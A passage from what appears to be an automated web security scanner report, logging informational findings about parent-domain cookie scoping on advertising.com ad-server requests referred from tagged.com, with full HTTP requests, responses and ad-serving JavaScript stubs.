Set-Cookie: ROLL=U6APDje2uuEWubJ!; domain=advertising.com; expires=Tue, 14-May-2013 18:35:44 GMT; path=/
Set-Cookie: 75068257=_4dd01d00,5283448503,776692^950393^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:35:44 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 600

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5155.272756.AOL-ADVERTISING/B5116932;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000776692/mnum
...[SNIP]...

13.26. http://r1-ads.ace.advertising.com/site=704672/size=728090/u=2/bnum=38037262/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=704672/size=728090/u=2/bnum=38037262/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=704672/size=728090/u=2/bnum=38037262/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=index&t=6015
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2=DJ9zNFJwIsb0F7RqHjQCiZAc

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 15 May 2011 18:35:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Location: http://r1-ads.ace.advertising.com/ctst=1/site=704672/size=728090/u=2/bnum=38037262/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F
Set-Cookie: ACID=ga450013054845430017; domain=advertising.com; expires=Tue, 14-May-2013 18:35:43 GMT; path=/
Set-Cookie: ASCID=ga450013054845430017; domain=advertising.com; path=/
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:35:43 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 317

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://r1-ads.ace.advertising.com/ctst=1/site=704672/size=728090/u=2/bnum=38037262/hr=13/hl=2/c=3/scres=5/swh=1920x12
...[SNIP]...

13.27. http://r1-ads.ace.advertising.com/site=705487/size=300250/u=2/bnum=43626829/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=705487/size=300250/u=2/bnum=43626829/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=705487/size=300250/u=2/bnum=43626829/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=9;w=300;h=250;p=;q=index&t=5598
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; ASCID=qw280013054845430029; C2=A0B0NFJwIsb0F8QqHjQCiZEY; F1=BEQHQ3EBAAAABAAAAIAAgEA; BASE=x7Q9Ci23SwnkpMdYS8Ne5rO!; ROLL=U6APAje2uuEWubpKMml2fHG!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:35:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.958688.705487.0XMC
Set-Cookie: C2=E0B0NFJwIsb0F8QqHjQCiZEYi+CCeziBwB; domain=advertising.com; expires=Tue, 14-May-2013 18:35:48 GMT; path=/
Set-Cookie: F1=BQQHQ3kAAAAAPPsCAEAAgEABAAAABAAAAMAAgEA; domain=advertising.com; expires=Tue, 14-May-2013 18:35:48 GMT; path=/
Set-Cookie: BASE=x7Q9Di23SwnkpMdYS8Ne5ruGnTaVK0B!; domain=advertising.com; expires=Tue, 14-May-2013 18:35:48 GMT; path=/
Set-Cookie: ROLL=U6APBje2uuEWubpKMml2fH2W+eDmKrC!; domain=advertising.com; expires=Tue, 14-May-2013 18:35:48 GMT; path=/
Set-Cookie: 43626829=_4dd01d04,1815717854,705487^958688^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:35:48 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 1055

document.write('<iframe src="http://view.atdmt.com/CNT/iview/285818429/direct;wi.300;hi.250/01/1815717854?click=http://r1-ads.ace.advertising.com/click/site=0000705487/mnum=0000958688/cstr=43626829=_4
...[SNIP]...

13.28. http://r1-ads.ace.advertising.com/site=776691/size=300250/u=2/bnum=24438061/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=776691/size=300250/u=2/bnum=24438061/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=776691/size=300250/u=2/bnum=24438061/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=9;w=300;h=250;p=;q=index&t=9432
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; ASCID=qw280013054845430029; C2=E0B0NFJwIsb0F8QqHjQCiZEYi+CCeziBwB; aceRTB=rm%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cam%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cdc%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Can%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Crub%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7C; F1=BkRHQ3EBAAAABAAAAQAAgEA; BASE=x7Q9Ei23SwnkpMdYS8Ne5ru2BcaVK0Bv+kOPmTH!; ROLL=U6APGje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpO!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:37:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.958688.776691.0XMC
Set-Cookie: C2=s1B0NFJwIsb0F8QqHjQCiZEYi+CCeziBwB; domain=advertising.com; expires=Tue, 14-May-2013 18:37:32 GMT; path=/
Set-Cookie: F1=BwWHQ3EBAAAABAAAAUAAgEA; domain=advertising.com; expires=Tue, 14-May-2013 18:37:32 GMT; path=/
Set-Cookie: BASE=x7Q9Fi23SwnkpMdYS8Ne5ru2BcaVK0Bv+kOPmTnZPuJelwD!; domain=advertising.com; expires=Tue, 14-May-2013 18:37:32 GMT; path=/
Set-Cookie: ROLL=U6APHje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOuczr/p+I!; domain=advertising.com; expires=Tue, 14-May-2013 18:37:32 GMT; path=/
Set-Cookie: 24438061=_4dd01d6c,3548225867,776691^958688^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:37:32 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 1055

document.write('<iframe src="http://view.atdmt.com/CNT/iview/285818429/direct;wi.300;hi.250/01/3548225867?click=http://r1-ads.ace.advertising.com/click/site=0000776691/mnum=0000958688/cstr=24438061=_4
...[SNIP]...

13.29. http://r1-ads.ace.advertising.com/site=776691/size=300250/u=2/bnum=28476770/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=776691/size=300250/u=2/bnum=28476770/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=776691/size=300250/u=2/bnum=28476770/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=9;w=300;h=250;p=;q=index&t=6506
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; ASCID=qw280013054845430029; C2=A0B0NFJwIsb0F8QqHjQCiZEY; F1=BEQHQ3EBAAAABAAAAIAAgEA; BASE=x7Q9Ci23SwnkpMdYS8Ne5rO!; ROLL=U6APAje2uuEWubpKMml2fHG!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:35:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.973880.776691.0XMC
Set-Cookie: F1=BQQHQ3EBAAAABAAAAMAAgEA; domain=advertising.com; expires=Tue, 14-May-2013 18:35:48 GMT; path=/
Set-Cookie: BASE=x7Q9Di23SwnkpMdYS8Ne5ru2BcaVK0B!; domain=advertising.com; expires=Tue, 14-May-2013 18:35:48 GMT; path=/
Set-Cookie: ROLL=U6APBje2uuEWubpKMml2fH2mYRDmKrC!; domain=advertising.com; expires=Tue, 14-May-2013 18:35:48 GMT; path=/
Set-Cookie: 28476770=_4dd01d04,5064751614,776691^973880^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:35:48 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 597

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3671.AOL/B5229711.6;sz=300x250;pc=[TPAS_ID];click=http://r1-ads.ace.advertising.com/click/site=0000776691/mnum=00
...[SNIP]...

13.30. http://r1-ads.ace.advertising.com/site=776691/size=300250/u=2/bnum=92522527/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Findex.html%253Fr%253D%25252Fideas.html%25253Ftype%25253Dsuggestions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=776691/size=300250/u=2/bnum=92522527/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Findex.html%253Fr%253D%25252Fideas.html%25253Ftype%25253Dsuggestions

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=776691/size=300250/u=2/bnum=92522527/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Findex.html%253Fr%253D%25252Fideas.html%25253Ftype%25253Dsuggestions HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=9;w=300;h=250;p=;q=index&t=1964
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; ASCID=qw280013054845430029; aceRTB=rm%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cam%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cdc%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Can%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Crub%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7C; C2=s1B0NFJwIsb0F8QqHjQCiZEYi+CCeziBwB; F1=BYaHQ3EBAAAABAAAAkAAgEA; BASE=x7Q9Fi23SwnkpMdYS8Ne5ru2BcaVK0Bv+kuPmTntoWJelwD!; ROLL=U6APLje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlIxo0kTqWZc1o6Dt86oeMfhU8M!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:38:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.958688.776691.0XMC
Set-Cookie: C2=o2B0NFJwIsb0F8QqHjQCiZEYi+CCeziBwB; domain=advertising.com; expires=Tue, 14-May-2013 18:38:32 GMT; path=/
Set-Cookie: F1=BgaHQ3EBAAAABAAAAoAAgEA; domain=advertising.com; expires=Tue, 14-May-2013 18:38:32 GMT; path=/
Set-Cookie: BASE=x7Q9Gi23SwnkpMdYS8Ne5ru2BcaVK0Bv+kuPmTntoWJelwznY4jXxpC!; domain=advertising.com; expires=Tue, 14-May-2013 18:38:32 GMT; path=/
Set-Cookie: ROLL=U6APIje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlIxo0kTqWZc1o6Dt86oeMfhU88Mx1KlZdN!; domain=advertising.com; expires=Tue, 14-May-2013 18:38:32 GMT; path=/
Set-Cookie: 92522527=_4dd01da8,7085454702,776691^958688^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:38:32 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 1055

document.write('<iframe src="http://view.atdmt.com/CNT/iview/285818429/direct;wi.300;hi.250/01/7085454702?click=http://r1-ads.ace.advertising.com/click/site=0000776691/mnum=0000958688/cstr=92522527=_4
...[SNIP]...

13.31. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=11211453/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fhelp.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=776692/size=728090/u=2/bnum=11211453/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fhelp.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=776692/size=728090/u=2/bnum=11211453/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fhelp.html HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=help&t=1245
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; ASCID=qw280013054845430029; aceRTB=rm%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cam%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cdc%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Can%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Crub%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7C; C2=o2B0NFJwIsb0F8QqHjQCiZEYi+CCeziBwB; F1=B4aHQ3EBAAAABAAAA0AAgEA; BASE=x7Q9Ji23SwnkpMdYS8Ne5ru2BcaVK0Bv+kuPmTntoWJelwznY4jXxpCTjtvy2vvmXa3CqqiTY9EZTNH!; ROLL=U6APPje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlIxo0kTqWZc1o6Dt86oeMfhU88Mx1KlZddqdZLZ49wJCPtHdWluzNpOTwO!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:38:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.996080.776692.0XMC
Set-Cookie: F1=BEbHQ3EBAAAABAAAA4AAgEA; domain=advertising.com; expires=Tue, 14-May-2013 18:38:41 GMT; path=/
Set-Cookie: BASE=x7Q9Ki23SwnkpMdYS8Ne5ru2BcaVK0Bv+kuPmTntoWJelwznY4jXxpCTjtvy2vvmXa3CqqiTY9EZTN3JW20eLPN!; domain=advertising.com; expires=Tue, 14-May-2013 18:38:41 GMT; path=/
Set-Cookie: ROLL=U6APMje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlIxo0kTqWZc1o6Dt86oeMfhU88Mx1KlZddqdZLZ49wJCPtHdWluzNpOTwuc9H5GWMO!; domain=advertising.com; expires=Tue, 14-May-2013 18:38:41 GMT; path=/
Set-Cookie: 11211453=_4dd01db1,6258886388,776692^996080^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:38:41 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 603

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6421.272756.AOL-ADVERTISING/B5119351.58;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000776692/m
...[SNIP]...

13.32. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=12741032/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fforgot_password.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=776692/size=728090/u=2/bnum=12741032/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fforgot_password.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=776692/size=728090/u=2/bnum=12741032/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fforgot_password.html HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=forgot_password&t=2041
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; ASCID=qw280013054845430029; aceRTB=rm%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cam%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cdc%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Can%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Crub%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7C; C2=o2B0NFJwIsb0F8QqHjQCiZEYi+CCeziBwB; F1=BMbHQ3EBAAAABAAAA8AAgEA; BASE=x7Q9Li23SwnkpMdYS8Ne5ru2BcaVK0Bv+kuPmTntoWJelwznY4jXxpCTjtvy2vvmXa3CqqiTY9EZTN3JW20eLPdrgh1P5SM!; ROLL=U6APNje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlIxo0kTqWZc1o6Dt86oeMfhU88Mx1KlZddqdZLZ49wJCPtHdWluzNpOTwuc9H5GWMuk/lQ81tI!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:46:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.964401.776692.0XMC
Set-Cookie: C2=29B0NFJwIsb0F7QqHjQCiZAYi+CCezixvB; domain=advertising.com; expires=Tue, 14-May-2013 18:46:14 GMT; path=/
Set-Cookie: F1=BY3HQ3EBAAAABAAAAABAeEA; domain=advertising.com; expires=Tue, 14-May-2013 18:46:14 GMT; path=/
Set-Cookie: BASE=x7Q9Mi23SwnkpMdYS8Ne5ru2BcaVK0Bv+kuPmTntoWJelwznY4jXxpCTjtvy2vvmXa3CqqiTY9EZTN3JW20eLPdrgh1P5SsSr6+LbSM!; domain=advertising.com; expires=Tue, 14-May-2013 18:46:14 GMT; path=/
Set-Cookie: ROLL=U6APSje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlIxo0kTqWZc1o6Dt86oeMfhU88Mx1KlZddqdZLZ49wJCPtHdWluzNpOTwuc9H5GWMuk/lQ81tYf50ZFTFJ!; domain=advertising.com; expires=Tue, 14-May-2013 18:46:14 GMT; path=/
Set-Cookie: 12741032=_4dd01f76,7772530313,776692^964401^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:46:14 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 1597

document.write('<HTML>');document.write('<HEAD>');document.write('<TITLE>&nbsp;</TITLE>');document.write('</HEAD>');document.write('<BODY>');document.write('<OBJECT classid=\'clsid:D27CDB6E-AE6D-11cf-
...[SNIP]...

13.33. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=24692193/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Findex.html%253Fr%253D%25252Fideas.html%25253Ftype%25253Dsuggestions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=776692/size=728090/u=2/bnum=24692193/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Findex.html%253Fr%253D%25252Fideas.html%25253Ftype%25253Dsuggestions

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=776692/size=728090/u=2/bnum=24692193/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Findex.html%253Fr%253D%25252Fideas.html%25253Ftype%25253Dsuggestions HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=index&t=1964
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; ASCID=qw280013054845430029; aceRTB=rm%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cam%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cdc%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Can%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Crub%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7C; C2=o2B0NFJwIsb0F8QqHjQCiZEYi+CCeziBwB; F1=BgaHQ3EBAAAABAAAAoAAgEA; BASE=x7Q9Gi23SwnkpMdYS8Ne5ru2BcaVK0Bv+kuPmTntoWJelwznY4jXxpC!; ROLL=U6APIje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlIxo0kTqWZc1o6Dt86oeMfhU88Mx1KlZdN!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:38:33 GMT
